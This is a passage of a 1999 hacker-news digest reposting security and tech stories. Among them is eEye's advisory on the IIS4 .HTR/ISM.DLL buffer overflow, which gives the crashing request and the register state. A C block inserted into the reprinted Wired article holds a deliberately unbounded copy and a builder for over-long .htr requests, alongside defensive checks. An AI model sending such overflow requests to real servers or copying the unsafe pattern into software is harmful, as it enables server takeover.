Vencor claims Lenox Healthcare owes $9 million for "therapy services," but Lenox Healthcare believes it owes Vencor nothing, the lawsuit says.
The lawsuit claims that Vencor's actions against Lenox Healthcare were motivated "in part by [its] plummeting stock price, a federal investigation of
Vencor's discrimination against and eviction of Medicaid patients, and securities fraud allegations."
The lawsuit accuses Vencor of carrying out a "vendetta" to seriously injure or financially ruin Lenox Healthcare.
According to financial reports, Vencor has been ordered by the federal government to repay $90 million in excessive Medicare reimbursements. The
company also was exposed for trying to evict Medicaid patients from its nursing homes to replace them with more lucrative private-paying patients.
The lawsuit accuses Vencor of earning "a national reputation for erratic, abusive and vindictive conduct in the operation of its business activities."
Lenox Healthcare, a privately owned long-term care company, owns or operates some 100 nursing homes, hospitals and assisted-living facilities
around the country.
@HWA
36.0 LA set to Allow Internet Voting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
The Louisiana Republican Party may allow people to vote
via computer in the Jan. 29, 2000, presidential caucus.
The company VoteHere.Net says its system is one of
the toughest to defeat. One has to wonder just how
tough it would be to compromise the client side of the
equation with programs like NetBus and Back Orifice
floating around.
US News and World Report
http://www.usnews.com/usnews/issue/990621/internet.htm
@HWA
37.0 CCC Camp Shapes Up
~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by tim
The Chaos Communication Camp, scheduled to take
place later this summer in Germany is shaping up nicely.
There is now a FAQ, registration information and even
some weird video stuff.
Chaos Communication Camp
http://www.ccc.de/camp/
Camp Trailer
ftp://ftp.cs.tu-berlin.de/pub/NeXT/video/movies/quicktime/rendezvous_qt2.mov
HNN Cons Page
http://www.hackernews.com/cons/cons.html
@HWA
38.0 Hong Kong Makes Major Piracy Bust
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Sinbad
Customs officials in Hong Kong have seized $2 million
worth of pirated software, production equipment, and
vehicles in what is being called the largest bust of its
kind. Officials confiscated 180,000 pirated
CDROM titles and arrested seven people.
Nando Times
http://www.techserver.com/story/body/0,1634,59240-94420-672929-0,00.html
Hong Kong Customs seize record number of pirated CD-ROMs
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
HONG KONG (June 13, 1999 9:53 a.m. EDT http://www.nandotimes.com) - Customs officials seized 180,000
illegal CD-ROMs along with production equipment in the latest raid to stop rampant copyright piracy,
the government reported Sunday.
Officials seized the record number of computer CD-ROMS, a large quantity of equipment and four vehicles,
worth a total of $2 million, during the raid Saturday, a statement from Customs said.
Seven people were arrested, but no charges had been filed, it said.
Despite frequent raids, Hong Kong remains a center for copyright pirating. Pirated CDs, video CDs and
computer software are widely available at shopping arcades and street vendors at a fraction of the cost
of a genuine copy.
@HWA
39.0 Ernst & Young Profile
~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by afghan
A nice adverticle for Ernst & Young's Global Securities
Solutions Center and its quick response team. Not much
'news' here but a real strong pitch for the 'eXtreme
hacking' course offered by the company. It also
mentions how great the Palm Pilot is.
Kansas City Star
http://www.kcstar.com/item/pages/business.pat,business/30db0e56.611,.html
Here is a link to PalmVNC that allows you to control an
Xserver with a little ol' Palm Pilot as mentioned in the
above article. (Not everything is proprietary.)
PalmVNC
http://www.icsi.berkeley.edu/~minenko/PalmVNC
KC Star;
Hacker U: Company offers security service, training against
computer invaders
By DAVID HAYES - The Kansas City Star
Date: 06/11/99 22:15
These aren't your father's accountants.
There isn't a button-down shirt among these Ernst & Young staffers.
Not one of them is toting a calculator or adding machine. And that
"generally accepted procedures" thing accounting firms like to talk
about? Forget it.
In fact, these employees of the Big Five accounting firm get a little
testy if you even ask whether they have an accounting background.
This is the Ernst & Young nerd squad. They aren't financial
accountants looking for weaknesses in their clients'
accounts-payable procedures. They're computer analysts looking
for holes in their clients' computer security systems and ways to
hack into their payroll.
It's big business.
Ernst & Young has 30 employees in its Global Securities Solutions
Center in Kansas City, new headquarters for a national and
international computer security operation that has 700 employees
worldwide. The operation expects to grow both here and
worldwide and take in about $60 million in 1999 -- up from $12
million three years ago.
"We see this as being the wave of the future," said Lisa Schlosser,
operations leader of eSecurity Solutions for Ernst & Young.
The program addresses computer security issues on several fronts
-- training information technology employees for clients; examining
corporate computer systems for potential holes; and moving in a
"quick response team" if a hacker breaks into a client's computer
system.
The service can be expensive -- $250,000 to more than $1 million,
depending on the size of the client and the company's computer
system, Schlosser said.
Even large corporations with well-protected computer systems are
ripe for a digital break-in, said Eric Schultze, a member of the
quick-response team and anti-hacking trainer for Ernst & Young.
One of the most critical computer break-ins Schultze said he had
worked on involved a company that took security very seriously.
"They had all types of physical security to get into the building,"
Schultze said. "But somebody got in and controlled their computer
systems. It had been going on for four to five days before they
discovered it."
When that happens, Ernst & Young sends in its quick-response unit
-- a team of three or more hacking experts, including some with law
enforcement experience. The team has been called out three times in
the last month.
As computers have become more prevalent in the workplace, the
problem has grown.
"With any large corporation you can almost guarantee they've had a
security breach somewhere," said George Kurtz, another member of
the Ernst & Young team.
To reduce the chance of such attacks, Ernst & Young has set up a
training program for its employees and for clients.
This week, 30 Ernst & Young employees from around the country
and from Canada, Great Britain and Denmark attended the
computer hacking boot camp at the Kansas City center.
The weeklong program, called "eXtreme hacking -- Defending your
site," is a $4,000 training course teaching "the greatest hacks out
there today," Schultze said. And, of course, those who take the
class are taught how to protect security systems from those
computer break-ins.
"We show them things they never thought were possible," Schultze
said.
Students in the class learn things like "account cracking," "exploiting
reciprocal trust," "hijacking the GUI," and various ways to break
into a computer system and find user passwords. On Thursday,
Ernst & Young trainers showed fellow employees how a hacker
could hijack a client's computer -- even rebooting it remotely --
using a Palm Pilot personal organizer.
Ernst & Young has held about 10 classes around the country in the
last year, mostly for the company's own employees. Similar classes
now are planned at the Kansas City center about once a month, and
the program is being opened to clients.
Instructors arrive packing a storeroom's worth of boxes with
notebook computers, routers, networking equipment, servers and
other computer gear. The classroom is set up to simulate various
types of corporate computer systems.
Schultze said the classes grew out of a computer break-in at a big
software company. "We showed the company stuff that amazed
them," he said. "They said, 'You guys can do that? Can you teach
us?'"
That's grown into a security practice that includes 23 laboratories
across the country, all connected to a lab in Kansas City. The
Kansas City lab includes every computer environment the company
can think of, so that the latest hacking -- or anti-hacking -- tools can
be tested before being deployed to other offices, Schlosser said.
The initial two-day course has become a weeklong anti-hacking
event with a combination of classroom lectures and hands-on
simulations that end with a hacker's version of a capture-the-flag
contest.
Not just anyone with $4,000 will be able to take the class.
"Obviously, we do some screening," Schultze said. The class is for
"white hat" hackers -- those who hack to find vulnerabilities in
systems, not their "black hat" counterparts who hack to do damage.
The Ernst & Young computer security team uses both easily
accessible hacking software tools and special programs developed
by the company.
The team showed students how to hack into a corporate computer
using a Palm Pilot and a program called PALM VNC. Using the
Palm Pilot's small screen, a hacker could see the hacked computer's
desktop, and even when the cursor moved on the screen.
"That was a pretty cool hack," said Royce Willis, from Ernst &
Young's Chicago office.
Kurtz showed the group another hijacking software program, called
NetBus, that takes hacking a step further. Once a hacker breaks
into a computer and installs NetBus, the program lets the hacker
play sounds on the hacked computer, open the computer's
CD-ROM drive or turn on a microphone attached to the computer
to listen to what's being said in the room, he said.
Schultze said VNC, NetBus and dozens of similar programs were
created as administrative tools for computer systems administrators.
"Any legitimate tool can be used for illegitimate purposes," Schultze
said.
After taking more than three days of anti-hacking classes and
learning that the instructors had secretly put a program on her laptop
that logged every letter or number she'd typed, Jenny Dho, from
Ernst & Young's Montreal office, said she'd learned a lot.
"It worries me for my clients' sake," Dho said.
Dave Morgan, who traveled from Ernst & Young's office in Vienna,
Va., to take the class, said: "Keeping up with this stuff is a full-time
job.
"Every day, something new is released into the wild. Hackers are
always one step ahead of us."
To reach David Hayes, technology writer, call (816) 234-4904 or
send e-mail to dhayes@kcstar.com
All content © 1999 The Kansas City Star
@HWA
40.0 What is Your Privacy Worth?
~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 15th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Do you know what value your privacy holds? The $2.3
billion marketing information industry sure does but how
do you convince a court how much your privacy is
worth if you need or want to sue a company for
damages? The Electronic Frontier Foundation intends to
find out. They have started research into the problem of
online identity value to make it easier for people to sue
for damages. One factor in the equation will be how
much companies charge for information, traditional use
of a name for a direct mailing costs around seven cents,
but on the Internet, each customer name is worth 15
cents.
CAL LAW
http://www.callaw.com/stories/edt0614f.html
The Electronic Frontier Foundation
http://www.eff.org/
CAL LAW;
Putting a Price on Our Internet Identities
By Renee Deger
In more moribund moments, many life insurance
policyholders have been known to joke bitterly about how
much they'd be worth dead.
Unfortunately, they have less of a clue of what they're
worth alive, says one longtime plaintiffs lawyer.
That's too bad, because marketing and retail companies are
making a killing at dealing in the habits and preferences of
living people -- information people often simply give away,
knowingly or not.
That cloud of ignorance is about to clear, and the average
person may soon have a better idea of what they're worth
as individuals.
The San Francisco-based Internet think tank Electronic
Frontier Foundation is embarking on an effort to put a price
on the average person's identity so that people can sue for
damages if their privacy is invaded -- especially their
privacy as Web surfers.
"An important part for an individual to negotiate with a
Web site is the total cost of ownership [of themselves],"
says Tara Lemmey, head of EFF.
Still in its infancy, the effort to value individualism will be
based in large part on how much money companies pay for
customer information, and how much companies score for
selling it.
"How many times is [an individual profile of a] person
selling, what's the value each time it's used, at what point
does it decay -- that translates to what it's worth to a
consumer," Lemmey says.
The Internet has already turned the $2.3 billion marketing
information industry on its ear. Traditional use of a name for
a direct mailing is seven cents, but on the Internet, each
customer name is worth 15 cents. Multiply that by millions
of names being swapped millions of times.
"Traditional list brokers jumped right in," says William
Dean, president of San Francisco market researcher W.A.
Dean & Associates.
"Information on the Internet is worth more because people
usually opt in" if they want to get more information or
e-mails, Dean adds.
Online information is so valuable that one start-up company
earlier this year went so far as to offer free Compaq
personal computers to anyone willing to be tracked. The
computers doled out by FreePC, at www.freepc.com, are
worth about $1,000 each, but the company is expected to
recoup the money by selling the information it gleans from
its "customers."
Arnold Laub, a San Francisco plaintiffs attorney, is enticed
by the prospects. "It's something that hasn't really been
analyzed. If it's done right and the economists get involved,
you can make a determination of interest and value," Laub
says.
"The problem is -- most people don't know the value of
their identity," he says.
Other factors of a human life have already been probed in
detail, however. In personal injury and wrongful death
claims, lawyers already can refer to actuarial tables and
economic formulas to value lost livelihood. And in claims
involving famous people who have already sold their
likeness or their creations, lawyers can refer to prior
contract terms.
Whether the EFF's effort produces the same kinds of
wallet-card-type dollar values on death and lost wages that
plaintiffs lawyers utilize is still up in the air, however.
Lemmey says the foundation's in-house lawyers have just
begun to kick around the idea and are hoping to come up
with a model to support broader debates. She says they
want people to become more conscious of the value they
add to commercial enterprises, and how much they can
demand from a company that doesn't keep its promises.
"If a company claims it's for one-time use or internal
purposes only or sells it, what are the damages?" asks
Lemmey. "No one knows."
@HWA
41.0 BSA Tactics Condemned by UK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 15th 1999
From HNN http://www.hackernews.com/
contributed by Warez Dude
The Birmingham Chamber of Commerce and Industry,
and the Advertising Standards Authority in England have
condemned the practices of the Business Software
Alliance. The two groups claim that recent tactics used
by the BSA in its 'Crackdown 99' campaign are
misleading and overly threatening.
Wired
http://www.wired.com/news/news/politics/story/20217.htm
(url unavailable June 24th - Ed)
@HWA
42.0 US Allows 128bit SSL Into Japan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 15th 1999
From HNN http://www.hackernews.com/
contributed by secret
Recent changes in the crypto export law have left open
a small loophole that allows 128-bit SSL encryption out of
the country. The recent export deregulation covered
"online merchants," or electronic shops, and if a user goes
directly to VeriSign in the United States, it is possible to
obtain a digital ID for 128-bit encryption at electronic
shops in Japan.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/73414
U.S. Export Loophole Allows 128-bit SSL Encryption to Be Used by Japanese Electronics Shops
June 10, 1999 (TOKYO) -- A loophole in U.S. export restrictions of 128-bit Secure Socket Layer
encryption is allowing Japanese electronics shops to adopt the stringent security method.
It was found that the digital ID for the server that enables 128-bit encryption can be easily
obtained at electronic shops. SSL is a mechanism of encrypted communications between Web
browsers and servers. In Japan, 40-bit SSL encryption is normally used. The 128-bit SSL encryption
is far more secure, with a key space about 10 to the 26th power times larger. Due to export restrictions imposed by the United
States, the use of 128-bit encryption in Japan was not permitted until December 1998, when the
United States partially deregulated 128-bit encryption exports and allowed their use in financial
institutions and the health care industry. Responding to this export deregulation of the
U.S. government, VeriSign Inc. of the United States began to offer the service to provide Digital
Authentication IDs for 128-bit SSL encryption for overseas countries, including Japan. This service
is called www.verisign.com and it began in April 1999 in Japan. The recent export deregulation
covered "online merchants," or electronic shops, but VeriSign Japan KK did not intend to provide
such general shops with digital IDs for 128-bit encryption because of safety considerations.
It was found, however, that if a user goes directly to VeriSign in the United States, it is possible
to obtain a digital ID for 128-bit encryption at electronic shops in Japan. Therefore, a highly secure
SSL can be used in Japan as well as in the United States, unless these electronic shops sell drugs and
materials considered to be used as weapons.
(Nikkei Multimedia)
@HWA
43.0 Terrorist About to Cause Electronic Chaos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 15th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Massive FUD (Fear, Uncertainty, and Doubt) in this
article. We might as well just give up because the world
will end tomorrow. Terrorists roaming the internet about
to cause massive chaos around the globe. The threat of
electronic terrorism is looming larger and larger each
day.
The Jerusalem Post
Monday, June 14, 1999 30 Sivan 5759 Updated Mon., Jun. 14 08:52
Computer terror can't be ignored
By YONAH ALEXANDER
(June 14) - The latest "Melissa" virus, which spreads via infected e-mail, and
the upsurge of computer intrusion by hackers into the Web sites of the White
House, Senate, and the FBI, have once again focused attention on
cyber-crime and its ominous international security implications.
It should be recalled that in February 1998, Ehud Tenenbaum, an Israeli
hacker also known as "The Analyzer," worked with two young collaborators
from California to mount cyber-attacks against the Pentagon's systems, a
nuclear weapons research lab and other significant targets.
The prevailing assessment of intelligence agencies, strategic thinkers, and
scientists is that not only hackers and "crackers" (criminal hackers) but also
terrorists - individuals, groups, and state sponsors - are likely to exploit the
vulnerability of the world's computer systems to conduct electronic warfare.
It is estimated, for instance, that hostile perpetrators, with a budget of
around $10 million and a team of some 30 computer experts strategically
placed around the globe, could bring the US to its knees.
The threat of electronic terrorist assaults grows with each passing day. There
are three reasons for this:
* The globalization of the Internet. Internet users currently number over 120
million; an estimated 1 billion people will be using it by the year 2005. This
makes efforts to control Internet attacks a daunting challenge to intelligence
services and law-enforcement agencies.
* There are now some 30,000 hacker-oriented sites on the Internet, making
the tools of disruption and destruction available to almost anyone. The easily
available recipes for these new weapons - worms, Trojan horses, and logic
bombs, among others - are making this form of warfare a permanent fixture
of international life.
* With the Cold War now behind us, terrorist organizations have cast off the
limitations and ideologies of the formerly bipolar world and have become
multidirectional. These new political realities, coupled with easily accessible
cyber-weapons, have enhanced the threats posed by terror groups to the
degree that they could alter life on our planet forever.
The Internet already serves as an arena for propaganda and psychological
warfare. Ideological extremists such as neo-Nazi groups have called for
ethnic, racial, and religious violence. Among traditional terrorist organizations,
Hizbullah, which is supported by Iran and Syria, maintains on its Web site a
daily record of "heroic" battles of its fighters in southern Lebanon. And
Afghanistan, the newest state sponsor of terrorism, pushes its radical brand
of Islam on-line.
Terrorists have also used their laptops to store operation plans. Ramzi
Ahmed Yusuf, who is serving a life sentence for the 1993 World Trade Center
bombing in New York and other terrorist crimes, used his computer to
develop a plot to blow up some dozen American airliners over the Pacific.
And terror networks, such as the underground infrastructure of Osama bin
Laden, who has been implicated in the US embassy bombings in Kenya and
Tanzania last summer, are sustained via personal computers with satellite
uplinks and encrypted messages.
Is the worst yet to come?
Consider waking one morning to the news that a group of terrorists
employing electronic "sniffers" have sabotaged the global financial system by
disrupting international fund-transfer networks, causing an unprecedented
stocks plunge on the New York, London, and Tokyo exchanges.
Clearly, there are numerous other devastating scenarios, including altering
formulas for medication at pharmaceutical plants; "crashing" telephone
systems; misrouting passenger trains; changing pressure in gas pipelines to
cause valve failure; disrupting operations of air-traffic control towers;
triggering oil refinery explosions and fires; scrambling the software used by
emergency services; turning off power grids; and simultaneously detonating
hundreds of computerized bombs around the world.
In sum, this new medium of communication, command and control,
supplemented by the repeated destructive keyboard attacks on civilian and
military nerve centers that we have already seen, forces us to think the
unthinkable - and take action to prevent it.
If the expanding electronic perils are ignored by the international community,
it is likely that the 21st century could produce a global Waterloo for
civilization.
(The writer is a professor and the director of the Inter-University Center for
Terrorism Studies - Israel and the United States.)
@HWA
44.0 Major Remote Hole Found in IIS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by Marc
eEye Digital Security Team has found a major remotely
exploitable hole in Microsoft's Internet Information
Server. The buffer overflow of ISM.dll leaves
approximately 90% of 1.3 million Microsoft web servers
vulnerable to internet attack. The folks at eEye have
graciously developed an exploit script to demonstrate
this hole. Microsoft has provided a work around and is
working on a patch.
eEye Digital Security Team
http://www.eeye.com/database/advisories/ad06081999/ad06081999.html
Wired
http://www.wired.com/news/news/technology/story/20231.html
Microsoft
http://www.microsoft.com/security/bulletins/ms99-019.asp
eEye;
Retina vs. IIS4, Round 2
Systems Affected:
Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4
Release Date:
June 8, 1999
Advisory Code:
AD06081999
Description:
We have been debating how to start out this advisory. How do
you explain that 90% or so of the Windows NT web servers on the
Internet are open to a hole that lets an attacker execute arbitrary
code on the remote web server? So the story starts...
The Goal:
Find a buffer overflow that will affect 90% of the Windows NT web
servers on the Internet. Exploit this buffer overflow.
The Theory:
There will be overflows in at least one of the default IIS filtered
extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit
will take place is that IIS will pass the full URL to the DLL that
handles the extension. Therefore if the ISAPI DLL does not do
proper bounds checking it will overflow a buffer taking IIS
(inetinfo.exe) with it and allow us to execute arbitrary code on the
remote server.
Entrance Retina:
At the same time of working on this advisory we have been
working on the AI mining logic for Retina's HTTP module. What
better test scenario than this? We gave Retina a list of 10 or so
extensions common to IIS and instructed it to find any possible
holes relating to these extensions.
The Grind:
After about an hour Retina found what appeared to be a hole. It
displayed that after sending "GET /[overflow].htr HTTP/1.0" it had
crashed the server. We all crossed our fingers, started up the
good ol' debugger and had Retina hit the server again.
Note: [overflow] is 3k or so characters... but we will not get into
the string lengths and such here. View the debug info and have a
look for yourself.
The Registers:
EAX = 00F7FCC8 EBX = 00F41130
ECX = 41414141 EDX = 77F9485A
ESI = 00F7FCC0 EDI = 00F7FCC0
EIP = 41414141 ESP = 00F4106C
EBP = 00F4108C EFL = 00000246
Note: Retina was using "A" (0x41 in hex) for the character to
overflow with. If you're not familiar with buffer overflows a quick
note would be that getting our bytes into any of the registers
is a good sign, and directly into EIP makes it even easier :)
Explain This:
The overflow is in relation to the .HTR extensions. IIS includes the
capability to allow Windows NT users to change their password
via the web directory /iisadmpwd/. This feature is implemented as
a set of .HTR files and the ISAPI extension file ISM.DLL. So
somewhere along the line when the URL is passed through to
ISM.DLL, proper bounds checking is not done and our
overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed
by default on IIS4 servers. Looks like we got our 90% of the
Windows NT web servers part down. However can we exploit this?
The Exploit:
Yes. We can definitely exploit this and we have. We will not go
into much detail here about how the buffer is exploited and such.
However, one nice thing to note is that the exploit has been
crafted in such a way to work on SP4 and SP5 machines,
therefore there is no guessing of offsets and possible accidental
crashing of the remote server.
See the Related Links below for more details about the exploit and the code.
The Fallout:
Almost 90% of the Windows NT web servers on the Internet are
affected by this hole. Even a server that's locked in a guarded
room behind a Cisco Pix can be broken into with this hole. This is
a reminder to all software vendors that testing for common
security holes in your software is a must. Demand more from
your software vendors.
The Request. (Well one anyway.)
Dear Microsoft,
One of the things that we found out is that IIS did not log any
trace of our attempted hack. We recommend that you pass all
server requests to the logging service before passing it to any
ISAPI filters etc...The logging service should be, as named, an
actual service running in a separate memory space so that when
inetinfo goes down intrusion signatures are still logged.
Retina vs. IIS4, Round 2. KO.
Fixes:
1. Remove the extension .HTR from the ISAPI DLL list.
   Microsoft has just updated their checklist to include this
   interim fix.
2. Apply the patch supplied by Microsoft when available.
Vendor Status:
We contacted Microsoft on June 8th 1999; eEye Digital Security
Team provided all information needed to reproduce the exploit
and how to fix it. The Microsoft security team confirmed the exploit
and is releasing a patch for IIS.
Related Links
Retina - The Network Security Scanner
http://www.eEye.com/retina/
Retina - Brain File used to uncover the hole
http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html
Exploit - How we did it and the code.
http://www.eEye.com/database/advisories/ad06081999/ad06081999-exploit.html
NetCat - TCP/IP "Swiss Army knife"
http://www.l0pht.com/~weld/netcat/
Greetings go out to:
The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9,
Attrition, HNN and any other security company or organization
that believes in full disclosure.
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of
this alert in any other medium excluding electronic medium,
please e-mail alert@eEye.com for permission.
Disclaimer:
The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
www.eEye.com
-=-
Wired;
E-Commerce Sites: Open Sesame?
by Niall McKay
11:40 a.m. 15.Jun.99.PDT
A major security flaw in a Microsoft Web
server could allow crackers to take
complete control of e-commerce Web
sites, security experts warned Tuesday.
The flaw in Microsoft's Internet
Information Server 4.0 allows
unauthorized remote users to gain
system-level access to the server,
according to Firas Bushnaq, CEO of eEye,
the Internet security firm that discovered
it.
"This hole is so serious it's scary," said
Jim Blake, a network administrator for
Irvine, a city in southern California.
"With other [Windows NT] security holes,
crackers have needed to gain some level
of user access before executing code on
the server. This is different.... Anybody
off the Web can crack IIS," he said.
More than 1.3 million Microsoft IIS servers
are up and running on the Web. Nasdaq,
Walt Disney, and Compaq are among the
larger e-commerce operations run off the
server, according to NetCraft Internet
surveys.
Microsoft confirmed that the problem
exists and said that it is working on a fix.
Customers, however, have not been
notified.
"Normally we will post the problem and
the bug fix at the same time," said
Microsoft spokeswoman Jennifer Todd.
"We take these security issues very
seriously, and the patch will be available
[soon]."
The fix will be posted to Microsoft's
security Web site, "probably in the next
couple of days," Todd said.
The exploit is just one of a long list of
security flaws affecting IIS 4.0. In May,
security experts found an exploit that
enabled crackers to gain read access to
files held on IIS when they requested
certain text files.
Last summer, an exploit known as the
$DATA Bug granted any non-technical
Web users access to sensitive information
within the source code used in Microsoft's
Active Server Page, which is used on IIS.
And in January, a similar IIS security hole
was discovered, one that exposed the
source code and certain system settings
of files on Windows NT-based Web
servers.
But the latest problem appears to be the
most serious because of the level of
access it reportedly allows.
"The exploit gives crackers access to any
database or software residing on the Web
server machine," said Bushnaq. "So they
could steal credit-card information or
even post counterfeit Web pages."
For instance, crackers could exploit the
bug to modify stock prices at one of the
many news and stock information sites
running IIS.
The hole allows remote users to gain
control of an IIS 4.0 server by creating
what is known as a "buffer overflow" on
.htr Web pages -- an IIS feature
designed to enable users to remotely
change their passwords.
A buffer overflow can occur when a
system is fed a value much larger than
expected. In the case of the bug, the
Dynamic Link Library (DLL) governing the
.htr file extension, called ISM.DLL, can be
overloaded by running a utility that loads
too many characters into the library.
Once overloaded, the DLL is disabled and
the content of the overflow "bleeds" into
the system.
"Normally, this would just crash the
system," said Space Rogue, a member of
L0pht Heavy Industries, an independent
security consulting firm that last year
testified before the United States Senate
on government information security.
"But a good cracker can write an exploit
where the data that overflows will
actually be an executable program that will
run as machine code," said Space Rogue.
Such a move could give a cracker
complete control of the target system.
The overflow executable program can be
used to run a system-level program that
will deliver the equivalent of a DOS
command window to an attacker's PC.
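As an added illustration of the defect class that both the eEye advisory ("The Theory" and "Explain This") and the Wired explanation above describe, and not code from eEye, Microsoft or Wired: a handler that copies the request URL into a fixed-size stack buffer with no bounds check, next to a bounded version, plus a front-end screen that rejects over-long .htr request lines before any extension DLL sees them, in the spirit of the advisory's interim fix and its request that requests be checked and logged before reaching ISAPI. The buffer size NAME_BUF, the 255-byte HTR_LIMIT, and every request line and path are assumptions constructed for the example.

```c
/* Added example, not eEye's, Microsoft's or Wired's code. Models the
 * defect the advisory describes (request URL copied into a fixed-size
 * stack buffer with no length check) beside a bounded copy and a
 * front-end screen for over-long .htr request lines. NAME_BUF,
 * HTR_LIMIT and all request lines are constructed assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF  256   /* assumed size of the handler's local buffer */
#define HTR_LIMIT 255   /* longest .htr path the front end lets through */

/* Defective pattern: strcpy with no length check. A path longer than
 * NAME_BUF writes past 'name' into the rest of the stack frame, which is
 * how the advisory's register dump ends up with EIP = 0x41414141 (four
 * 'A' bytes). Kept for contrast; only called below with a short path. */
static void htr_copy_unbounded(const char *path) {
    char name[NAME_BUF];
    strcpy(name, path);                 /* defect: no bounds check */
    printf("unbounded handler got: %s\n", name);
}

/* Bounded version: refuse anything that would not fit, including the
 * terminating NUL, then copy exactly. 0 = copied, -1 = rejected. */
int htr_copy_bounded(const char *path, char *out, size_t outlen) {
    size_t n = strlen(path);
    if (outlen == 0 || n >= outlen)
        return -1;
    memcpy(out, path, n + 1);
    return 0;
}

/* Case-insensitive ".htr" suffix test, as IIS matches extensions. */
static int has_htr_extension(const char *p, size_t len) {
    return len >= 4 && p[len - 4] == '.' &&
           tolower((unsigned char)p[len - 3]) == 'h' &&
           tolower((unsigned char)p[len - 2]) == 't' &&
           tolower((unsigned char)p[len - 1]) == 'r';
}

/* Screen one raw request line such as "GET /x.htr HTTP/1.0" before it
 * is dispatched to any extension. 1 = reject (over-long .htr path),
 * 0 = pass through, -1 = malformed request line. */
int screen_request_line(const char *line) {
    const char *sp1 = strchr(line, ' ');
    const char *path, *sp2, *q;
    size_t plen, ext_len;
    if (!sp1)
        return -1;
    path = sp1 + 1;
    sp2 = strchr(path, ' ');
    plen = sp2 ? (size_t)(sp2 - path) : strlen(path);
    if (plen == 0)
        return -1;
    q = memchr(path, '?', plen);        /* ignore the query string */
    ext_len = q ? (size_t)(q - path) : plen;
    if (has_htr_extension(path, ext_len) && plen > HTR_LIMIT)
        return 1;
    return 0;
}

/* Constructs "/AAAA...A.htr" with 'fill' filler bytes (the advisory's
 * request used roughly 3k of 'A'). 0 = built, -1 = buffer too small. */
int build_long_htr_path(char *buf, size_t buflen, size_t fill) {
    if (fill + 6 > buflen)              /* "/" + fill + ".htr" + NUL */
        return -1;
    buf[0] = '/';
    memset(buf + 1, 'A', fill);
    memcpy(buf + 1 + fill, ".htr", 5);
    return 0;
}

/* Builds the constructed request line and returns the screen's verdict. */
int screen_constructed_long_request(size_t fill) {
    static char path[8192], line[8192 + 32];
    if (build_long_htr_path(path, sizeof path, fill) != 0)
        return -1;
    snprintf(line, sizeof line, "GET %s HTTP/1.0", path);
    return screen_request_line(line);
}

/* Runs the constructed path through the bounded copy into a NAME_BUF
 * buffer: 0 = it fit, -1 = rejected instead of overflowing. */
int bounded_copy_constructed_path(size_t fill) {
    static char path[8192];
    char out[NAME_BUF];
    if (build_long_htr_path(path, sizeof path, fill) != 0)
        return -1;
    return htr_copy_bounded(path, out, sizeof out);
}

int main(void) {
    printf("screen 3000-byte .htr request: %d\n", screen_constructed_long_request(3000));
    printf("screen normal .htr request:    %d\n",
           screen_request_line("GET /iisadmpwd/example.htr HTTP/1.0"));
    printf("bounded copy of 3000-byte path: %d\n", bounded_copy_constructed_path(3000));
    htr_copy_unbounded("/iisadmpwd/example.htr");   /* short path: fits */
    return 0;
}
```

The screen is deliberately coarse: it looks only at the request line, so it can run (and log) in front of the server process, which is the point the advisory makes about keeping intrusion signatures even when inetinfo goes down. It is no substitute for removing the .HTR mapping or applying the vendor patch.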
To demonstrate the hole, eEye wrote a
program called IIS Hack that will enable
users to crack and execute code on any
IIS 4.0 Web Server.
However, disabling or removing the .htr
password utility will not fix the problem,
according to Bushnaq. "You have got to
go through a series of steps to remove
the faulty [code]."
eEye discovered the problem while beta
testing a network security auditing tool.
"Remote exploits are about the most
serious problems you can have with a
Web server," said Space Rogue. "It gives
the attacker root privileges, so the
cracker not only has access to the IIS
server but [to] software running on that
machine."
"In many corporate sites today, this will
give the cracker access to the entire
network."
eEye is a software development firm
specializing in security audit tools. Chief
executive Bushnaq previously founded the
electronic commerce site ECompany.com.
-=-
@HWA
45.0 Outlook Express 4.5 Email Bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by deepquest
Maccentral.com is reporting on a bug in Outlook Express
4.5. Basically what it comes down to is if your machine
has more than one email account, and you know the
password for one account then you can gain access to
all the accounts. Pretty damaging hole for multi users
machines.
MacCentral Online
http://www.maccentral.com/news/9906/15.sonata.shtml
Email encryption problems should be solved in Sonata
by Dennis Sellers, dsellers@maccentral.com
June 15, 1999, 9:45 am ET
If you're using a free Mac email application, you inherently have a lack of secure
encryption as Andrew Jung, a computer science student at Camosun College
(Victoria BC, Canada), recently discovered. Jung was using Outlook Express 4.5
on the family iMac when he came upon what he described as a "disturbing bug."
Jung attempted to use the "Change Current User" menu item of Outlook Express
to access his personal email account (three separate email accounts were on the
family Mac) when he realized he'd forgotten his password. He clicked "Cancel" and
was returned to the account selection dialog.
